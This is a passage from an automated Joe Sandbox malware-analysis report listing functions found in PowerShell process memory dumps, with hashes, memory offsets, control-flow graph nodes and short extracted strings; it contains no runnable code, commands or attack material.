                                        Function 00F3FBE8 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction ID: c6ffe8ca86ad8b591e1b7e4fb2a4542847f3015a05f158416667ec8e1a44ce6a
                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction Fuzzy Hash: F1D067B1D0420D9F8780EFADC94166EFBF4EB49210F6085BA891DE7301E7329A129BD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F38448 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ce223744c7ead707b56dad40b97617b8b9d0fe50471134209111a2ea2ad7cb6
                                        • Instruction ID: ff9edac0bd01f6aecaa9ffd43b8c67c4adcdcc257f22be0e5bca209b1ebde7df
                                        • Opcode Fuzzy Hash: 9ce223744c7ead707b56dad40b97617b8b9d0fe50471134209111a2ea2ad7cb6
                                        • Instruction Fuzzy Hash: 7ED0673580410ACBCF48EBA4F85E4BDBB34FB24301F60416EF92752591EE351A9ACBC5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F38510 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42bb6649aa87fec048f588d2ce6675e2d46d50e5eb67109c1d4b302765c0b57d
                                        • Instruction ID: febf80457533fb78dee555d7eaae8bd4402a6412d50df68cb6449afae10c2222
                                        • Opcode Fuzzy Hash: 42bb6649aa87fec048f588d2ce6675e2d46d50e5eb67109c1d4b302765c0b57d
                                        • Instruction Fuzzy Hash: B8D01734A0820ACB8B48EFA4E44A86EBFB5EB44300F20416EED0993341EE305C41DBC0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F37618 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 031d639f0031645b1b0e04f6cb03ec08459b1966572dfe03a2858039f3f6b019
                                        • Instruction ID: 9403863739b6401816587f3853a6b21e5226faa08e1b9284016037ff310b63f0
                                        • Opcode Fuzzy Hash: 031d639f0031645b1b0e04f6cb03ec08459b1966572dfe03a2858039f3f6b019
                                        • Instruction Fuzzy Hash: CCD012721056058FD71F5EB0D9B14243716FB8214670244DED14B1F3E2DE358945C755
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F37628 Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 97690a73d55a3c538feaba79f5fd450d996a1c5d3410f90175e11ceb488f3748
                                        • Instruction ID: 610e7c320e2cbea6259ca537958532daec6003c5c4cd32318fa6da1664305a8d
                                        • Opcode Fuzzy Hash: 97690a73d55a3c538feaba79f5fd450d996a1c5d3410f90175e11ceb488f3748
                                        • Instruction Fuzzy Hash: 2CB09232044709CFC3496F79E408918732DBA4021938108A8E50E0B292CE36E885CA46
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F37B90 Relevance: .0, Instructions: 8COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a384ab61ea685cd9a07250b96f33ac6b4c268b521d24811d377bc5892e777d87
                                        • Instruction ID: 076dc4990ad23a76b942538854f069e01db5b7797a60f2109668cc5dda8fc79e
                                        • Opcode Fuzzy Hash: a384ab61ea685cd9a07250b96f33ac6b4c268b521d24811d377bc5892e777d87
                                        • Instruction Fuzzy Hash: EFC04C768142514FFE17966895256143F347A16341B0680D6DC9186192AA110A2DC6A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 07600D38 Relevance: 16.7, Strings: 13, Instructions: 424COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1770971047.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7600000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$4'^q$4'^q$`Q^q$`Q^q$tP^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-3359492452
                                        • Opcode ID: eb3869e6d92769cafd14e94500960684eef5dd01f293d05f2754418ff07a9e16
                                        • Instruction ID: 7218d53b6ef671f8b48dabfc62b88c122dc31ff85d67aa4c6baf386c306eb176
                                        • Opcode Fuzzy Hash: eb3869e6d92769cafd14e94500960684eef5dd01f293d05f2754418ff07a9e16
                                        • Instruction Fuzzy Hash: BCE1B4B160420ADFDB1D8F69D544B6FBBB6AB86310F18846AE8069B3D1CB31DC85C7D1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07601020 Relevance: 11.4, Strings: 9, Instructions: 184COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1770971047.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7600000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2306644927
                                        • Opcode ID: 0b3d0ae8027c4a17d2dbd00c16b7eed3890037f4c7312844cd7c56957d0dab48
                                        • Instruction ID: 7234306141ffd2c0e7f78d473f211bec316910e45cc9e8e24b963c0dd5463b71
                                        • Opcode Fuzzy Hash: 0b3d0ae8027c4a17d2dbd00c16b7eed3890037f4c7312844cd7c56957d0dab48
                                        • Instruction Fuzzy Hash: 2E6179B0A1020EDBDB2D8E64C544BAFB7B6BB46311F1580A5E8029B3D0C775DD85CBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F37708 Relevance: 5.2, Strings: 4, Instructions: 239COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: 559e217d709d6149c5ece6cf79ca358dec36fa128baf2444f234048f4915ebe8
                                        • Instruction ID: 1cf162800486c7e057f883c931ee3c88745731a1777b7cefc3afaa7e26b8c93f
                                        • Opcode Fuzzy Hash: 559e217d709d6149c5ece6cf79ca358dec36fa128baf2444f234048f4915ebe8
                                        • Instruction Fuzzy Hash: D9B18374E012099FCB54DFA9D990A9DFBF2FF88310F208629E419AB355DB31A945CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F37718 Relevance: 5.2, Strings: 4, Instructions: 234COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: `_q$`_q$`_q$`_q
                                        • API String ID: 0-3297199963
                                        • Opcode ID: b117c9b49ce80a6668a7aa3ebfd34f1978ab29e6397b082ec8b83218d3e5750d
                                        • Instruction ID: a39df08d6675b9887f6bb753dd10e69b69813b23d1d189678e91677c38f12674
                                        • Opcode Fuzzy Hash: b117c9b49ce80a6668a7aa3ebfd34f1978ab29e6397b082ec8b83218d3e5750d
                                        • Instruction Fuzzy Hash: FAB18374E012099FCB54DFA9D990A9DFBF2FF88310F208629E419AB355DB31A945CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0760030A Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1770971047.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7600000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$$^q$$^q
                                        • API String ID: 0-2049395529
                                        • Opcode ID: 9e76f980157789b1a9342b956c8e0167e54c01602a5d219ad9af761800198f85
                                        • Instruction ID: 75f1f8a3503e50f5d2bd0f6d26a9b29a14e87dc00964251b273eeb6977ded62b
                                        • Opcode Fuzzy Hash: 9e76f980157789b1a9342b956c8e0167e54c01602a5d219ad9af761800198f85
                                        • Instruction Fuzzy Hash: 1201A26174A3964FC32F16385924226AFF22F8391072944D7D042DF3ABCE158D4A83E7
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:6.7%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:3
                                        Total number of Limit Nodes:0
                                        execution_graph 19033 8195508 19034 819554b SetThreadToken 19033->19034 19035 8195579 19034->19035

                                        Executed Functions

                                        Function 00E1C537 Relevance: .3, Instructions: 253COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eeffb42de5f8b34e1837ff9ff28bb2e370e96626987598299801c88282daddf9
                                        • Instruction ID: 64400bc330d677435e00a9cf7c482c5dfa23488efb8bd2e60fc7bf0c9fd4f5f6
                                        • Opcode Fuzzy Hash: eeffb42de5f8b34e1837ff9ff28bb2e370e96626987598299801c88282daddf9
                                        • Instruction Fuzzy Hash: 8D917FB1B406155BDB19EFB4C8156AEB7F2EF84704B00892DD50AEB740DF746E0A8BC6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1C538 Relevance: .3, Instructions: 252COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5833cc656f054ba34aa698bc83f7902c30acbfbce9b6084108096c2d664281ab
                                        • Instruction ID: 1e26b818969925fcf6eead56215a5d4bcf15824a6ad03f33f990f6020b3b590d
                                        • Opcode Fuzzy Hash: 5833cc656f054ba34aa698bc83f7902c30acbfbce9b6084108096c2d664281ab
                                        • Instruction Fuzzy Hash: E3917EB1B406155BDB19EFB4C8156AEB7F2EF84704B00892DD50AEB740DF746E0A8BC6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07021D20 Relevance: 18.1, Strings: 14, Instructions: 561COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 7021d20-7021d41 1 7021d47-7021d4c 0->1 2 7021e9b-7021eb8 0->2 3 7021d64-7021d70 1->3 4 7021d4e-7021d54 1->4 9 7021ee1-7021ee2 2->9 10 7021eba-7021ebc 2->10 12 7021d76-7021d79 3->12 13 7021e4b-7021e55 3->13 6 7021d56 4->6 7 7021d58-7021d62 4->7 6->3 7->3 16 7021ee3-7021eed 9->16 17 7021ffa-7022030 9->17 14 7021ebe-7021ede 10->14 15 7021f2d-7021f33 10->15 12->13 18 7021d7f-7021d86 12->18 21 7021e62-7021e68 13->21 22 7021e57-7021e5f 13->22 14->9 19 7021f37-7021f43 15->19 20 7021f35 15->20 23 7021f05-7021f09 16->23 24 7021eef-7021ef5 16->24 34 7022032-702203e 17->34 35 7022040 17->35 18->2 27 7021d8c-7021d91 18->27 28 7021f45-7021f50 19->28 20->28 29 7021e6a-7021e6c 21->29 30 7021e6e-7021e7a 21->30 25 7021f0f-7021f11 23->25 26 7021fac-7021fb6 23->26 31 7021ef7 24->31 32 7021ef9-7021f03 24->32 25->26 36 7021f17-7021f23 25->36 37 7021fc3-7021fc9 26->37 38 7021fb8-7021fc0 26->38 39 7021d93-7021d99 27->39 40 7021da9-7021dad 27->40 56 7021f52-7021f58 28->56 57 7021f68-7021fa9 28->57 42 7021e7c-7021e98 29->42 30->42 31->23 32->23 43 7022042-7022044 34->43 35->43 36->15 44 7021fcb-7021fcd 37->44 45 7021fcf-7021fdb 37->45 46 7021d9b 39->46 47 7021d9d-7021da7 39->47 40->13 48 7021db3-7021dcc 40->48 54 70220d0-70220da 43->54 55 702204a-7022051 43->55 53 7021fdd-7021ff7 44->53 45->53 46->40 47->40 84 7021dd0-7021ddc 48->84 85 7021dce 48->85 59 70220e6-70220ec 54->59 60 70220dc-70220e3 54->60 62 7022122-702215e 55->62 63 7022057-702205c 55->63 66 7021f5a 56->66 67 7021f5c-7021f5e 56->67 69 70220f2-70220fe 59->69 70 70220ee-70220f0 59->70 79 7022160-702216c 62->79 80 702216e 62->80 72 7022074-702209f 63->72 73 702205e-7022064 63->73 66->57 67->57 74 7022100-702211f 69->74 70->74 72->62 89 70220a5-70220b3 72->89 75 7022066 73->75 76 7022068-7022072 73->76 75->72 76->72 86 7022170-7022172 79->86 80->86 90 7021dde-7021e48 84->90 85->90 92 7022250-702225a 86->92 93 7022178-702217a 86->93 95 70220ba-70220cd 89->95 96 7022268-702226e 92->96 97 702225c-7022265 92->97 98 702218a 93->98 99 702217c-7022188 93->99 102 7022270-7022272 96->102 103 7022274-7022280 96->103 101 702218c-702218e 98->101 99->101 101->92 105 7022194-7022196 101->105 106 7022282-702229e 102->106 103->106 107 70221b0-70221b5 105->107 108 7022198-702219e 105->108 113 70221b7-70221bd 107->113 114 70221cf-70221d9 107->114 110 70221a2-70221ae 108->110 111 70221a0 108->111 110->107 111->107 117 70221c1-70221cd 113->117 118 70221bf 113->118 115 70222a1-70222d4 114->115 116 70221df-70221fa 114->116 127 70222d6-70222e2 115->127 128 70222e4 115->128 125 7022214-702224d 116->125 126 70221fc-7022202 116->126 117->114 118->114 129 7022206-7022212 126->129 130 7022204 126->130 131 70222e6-70222e8 127->131 128->131 129->125 130->125 133 70222ea-7022309 131->133 134 702235c-7022366 131->134 147 702230b-7022317 133->147 148 7022319 133->148 137 7022370-7022376 134->137 138 7022368-702236d 134->138 140 7022378-702237a 137->140 141 702237c-7022388 137->141 142 702238a-70223a1 140->142 141->142 149 702231b-702231d 147->149 148->149 149->134 151 702231f-7022344 149->151 154 7022352-7022359 151->154 155 7022346-7022348 151->155 155->154
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$4'^q$4'^q$<-tk$piJk$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-1206889041
                                        • Opcode ID: 86b0c323aaea05ce27a1636ef129f0972fdadbcd81793023ecdc15e2a6b83d99
                                        • Instruction ID: d7fea3bf8377dac36184caefb347d51dcd95f7b1ab15e85fe92d6628dbe5b11a
                                        • Opcode Fuzzy Hash: 86b0c323aaea05ce27a1636ef129f0972fdadbcd81793023ecdc15e2a6b83d99
                                        • Instruction Fuzzy Hash: 76029A737043698FCB658BA8D804A6ABBF5AFC6210F1585ABD515CB352CB32CC46C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07022948 Relevance: 17.0, Strings: 13, Instructions: 773COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1853617720.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_7020000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q$4'^q$4'^q$<cuk$piJk$piJk$piJk$piJk$piJk$|,Lk$xl$xl
                                        • API String ID: 0-276384459
                                        • Opcode ID: 32ff7391f9211fdcba72f36d508c0cc470f468c4004240c666ed9e4df65f508e
                                        • Instruction ID: 6a04c50bdf1d48fb311c6a9f14032d03efeaeae1fde91e5eb4f0cbef1497bac4
                                        • Opcode Fuzzy Hash: 32ff7391f9211fdcba72f36d508c0cc470f468c4004240c666ed9e4df65f508e
                                        • Instruction Fuzzy Hash: B3428B72B00226CFCB658BA8C9406ABBBE6BFC5310F15867AE415CB351DB35C846D7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 08195500 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 568 8195500-8195543 569 819554b-8195577 SetThreadToken 568->569 570 8195579-819557f 569->570 571 8195580-819559d 569->571 570->571
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1859265854.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_8190000_powershell.jbxd
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID: N'
                                        • API String ID: 3254676861-2790810407
                                        • Opcode ID: 06efb5821ee5011d6cc580fe6dd846e6e7541df69cefa6f5879a3059a1ddf920
                                        • Instruction ID: ae0d21a10af481c77f89f92a66617adb81196b9de55e0318758791e51b81e194
                                        • Opcode Fuzzy Hash: 06efb5821ee5011d6cc580fe6dd846e6e7541df69cefa6f5879a3059a1ddf920
                                        • Instruction Fuzzy Hash: F31104B59006488FDB20CF99D584BDEBBF5AF48320F148419D499A7220C779A944CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 08195508 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 574 8195508-8195577 SetThreadToken 576 8195579-819557f 574->576 577 8195580-819559d 574->577 576->577
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1859265854.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_8190000_powershell.jbxd
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID: N'
                                        • API String ID: 3254676861-2790810407
                                        • Opcode ID: 4eb1d8acd15802c7a5e7e23c64db1945a6e5219aa1e11b57d1fff23a55945a79
                                        • Instruction ID: 90c90bd12ac8f8d22b22f821a4bbb69663e2ff527a5e1c5e8ec159bced7e9104
                                        • Opcode Fuzzy Hash: 4eb1d8acd15802c7a5e7e23c64db1945a6e5219aa1e11b57d1fff23a55945a79
                                        • Instruction Fuzzy Hash: FB1113B19002088FDB10DF9AC584BDEFBF9AB48320F14841AD559A7220D774A944CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1CB68 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 580 e1cb68-e1cbf8 584 e1cbfa 580->584 585 e1cbfe-e1cc09 580->585 584->585 586 e1cc0b 585->586 587 e1cc0e-e1cc68 call e1c040 585->587 586->587 594 e1ccb9-e1ccbd 587->594 595 e1cc6a-e1cc6f 587->595 597 e1ccbf-e1ccc9 594->597 598 e1ccce 594->598 595->594 596 e1cc71-e1cc94 595->596 600 e1cc9a-e1cca5 596->600 597->598 599 e1ccd3-e1ccd5 598->599 601 e1ccd7-e1ccf8 599->601 602 e1ccfa-e1ccfd call e1b620 599->602 603 e1cca7-e1ccad 600->603 604 e1ccae-e1ccb7 600->604 606 e1cd02-e1cd06 601->606 602->606 603->604 604->599 609 e1cd08-e1cd31 606->609 610 e1cd3f-e1cd6e 606->610 609->610
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: N'
                                        • API String ID: 0-2790810407
                                        • Opcode ID: 43581080fefc27d066cf28f76123a081948c3bc1dbf9d646894bf8cd5c3725c1
                                        • Instruction ID: 6c4877967b0e83290eb01a531cf7f5a4a9b779bf43703e0162d6f31a3925b3e5
                                        • Opcode Fuzzy Hash: 43581080fefc27d066cf28f76123a081948c3bc1dbf9d646894bf8cd5c3725c1
                                        • Instruction Fuzzy Hash: A561F5B1D002489FDB14DFA9D5446DDFBF1EF88314F24816AE809AB364DB749D85CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1CB5A Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 619 e1cb5a-e1cbf8 624 e1cbfa 619->624 625 e1cbfe-e1cc09 619->625 624->625 626 e1cc0b 625->626 627 e1cc0e-e1cc68 call e1c040 625->627 626->627 634 e1ccb9-e1ccbd 627->634 635 e1cc6a-e1cc6f 627->635 637 e1ccbf-e1ccc9 634->637 638 e1ccce 634->638 635->634 636 e1cc71-e1cc94 635->636 640 e1cc9a-e1cca5 636->640 637->638 639 e1ccd3-e1ccd5 638->639 641 e1ccd7-e1ccf8 639->641 642 e1ccfa-e1ccfd call e1b620 639->642 643 e1cca7-e1ccad 640->643 644 e1ccae-e1ccb7 640->644 646 e1cd02-e1cd06 641->646 642->646 643->644 644->639 649 e1cd08-e1cd31 646->649 650 e1cd3f-e1cd6e 646->650 649->650
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: N'
                                        • API String ID: 0-2790810407
                                        • Opcode ID: 69904b95381c13193d3fd8a531fd0d855a542117dbda3afde3d7622c1a99f7e0
                                        • Instruction ID: c14388dd5c9e6ec8a96fb4e4aadbd76c61279ddc85ab3dc4a9d7cf6c1eda0af7
                                        • Opcode Fuzzy Hash: 69904b95381c13193d3fd8a531fd0d855a542117dbda3afde3d7622c1a99f7e0
                                        • Instruction Fuzzy Hash: 665116B0A002089FCB14DFA9D5846DDFBF5EF88314F24816AE809EB364DB749D85CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E18200 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 834 e18200-e1821f 835 e18325-e18363 834->835 836 e18225-e18228 834->836 863 e1822a call e188b7 836->863 864 e1822a call e1889c 836->864 837 e18230-e18242 839 e18244 837->839 840 e1824e-e18263 837->840 839->840 845 e18269-e18279 840->845 846 e182ee-e18307 840->846 849 e18285-e18290 845->849 850 e1827b 845->850 851 e18312-e18313 846->851 852 e18309 846->852 865 e18293 call e1cfc8 849->865 866 e18293 call e1d018 849->866 867 e18293 call e1cfba 849->867 850->849 851->835 852->851 856 e18299-e1829d 857 e182dd-e182e8 856->857 858 e1829f-e182af 856->858 857->845 857->846 859 e182b1-e182c1 858->859 860 e182cb-e182d5 858->860 862 e182c9 859->862 860->857 862->857 863->837 864->837 865->856 866->856 867->856
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (bq
                                        • API String ID: 0-149360118
                                        • Opcode ID: db8576396532dd51383e18f0daf7c5ebf291ad599c35d0bf9f41348f2a5941fa
                                        • Instruction ID: c3487ce5e0f3d21cfe11159b43c7c9cf8af5c07f3965ac8ffd14b81e3e70a2fd
                                        • Opcode Fuzzy Hash: db8576396532dd51383e18f0daf7c5ebf291ad599c35d0bf9f41348f2a5941fa
                                        • Instruction Fuzzy Hash: 6A412B74B006048FDB19DBA8C554AAEBBF1AF8D715F285099E406BB3A5CA31DC41CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1A48F Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 883 e1a48f-e1a4f5 885 e1a4f7-e1a508 883->885 886 e1a52a-e1a536 883->886 885->886 887 e1a538-e1a548 886->887 888 e1a56a-e1a571 886->888 887->888 889 e1a573 888->889 890 e1a58b-e1a593 888->890 898 e1a578 call e1a5f0 889->898 899 e1a578 call e1a5ef 889->899 891 e1a595-e1a5b8 890->891 892 e1a5ca-e1a5d9 890->892 895 e1a5c1-e1a5c8 891->895 896 e1a5ba-e1a5c0 891->896 893 e1a57e-e1a584 893->890 895->892 896->895 898->893 899->893
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: N'
                                        • API String ID: 0-2790810407
                                        • Opcode ID: 78668cd67ec38e0a67b1000e884598bb0ff33ca36dbf6d046b91c367de493768
                                        • Instruction ID: 782dd2c7ddc2686be36e9ab7bdd6e90c3624cfcb9fe02003223480e0f3f433a7
                                        • Opcode Fuzzy Hash: 78668cd67ec38e0a67b1000e884598bb0ff33ca36dbf6d046b91c367de493768
                                        • Instruction Fuzzy Hash: 7F319CB090A3448BDB60CF6AD0883DAFBF6EF84324F28842DD84DA7245D6745885CB52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00E1A4A0 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 900 e1a4a0-e1a4f5 902 e1a4f7-e1a508 900->902 903 e1a52a-e1a536 900->903 902->903 904 e1a538-e1a548 903->904 905 e1a56a-e1a571 903->905 904->905 906 e1a573 905->906 907 e1a58b-e1a593 905->907 915 e1a578 call e1a5f0 906->915 916 e1a578 call e1a5ef 906->916 908 e1a595-e1a5b8 907->908 909 e1a5ca-e1a5d9 907->909 912 e1a5c1-e1a5c8 908->912 913 e1a5ba-e1a5c0 908->913 910 e1a57e-e1a584 910->907 912->909 913->912 915->910 916->910
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1824507505.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_e10000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: N'
                                        • API String ID: 0-2790810407
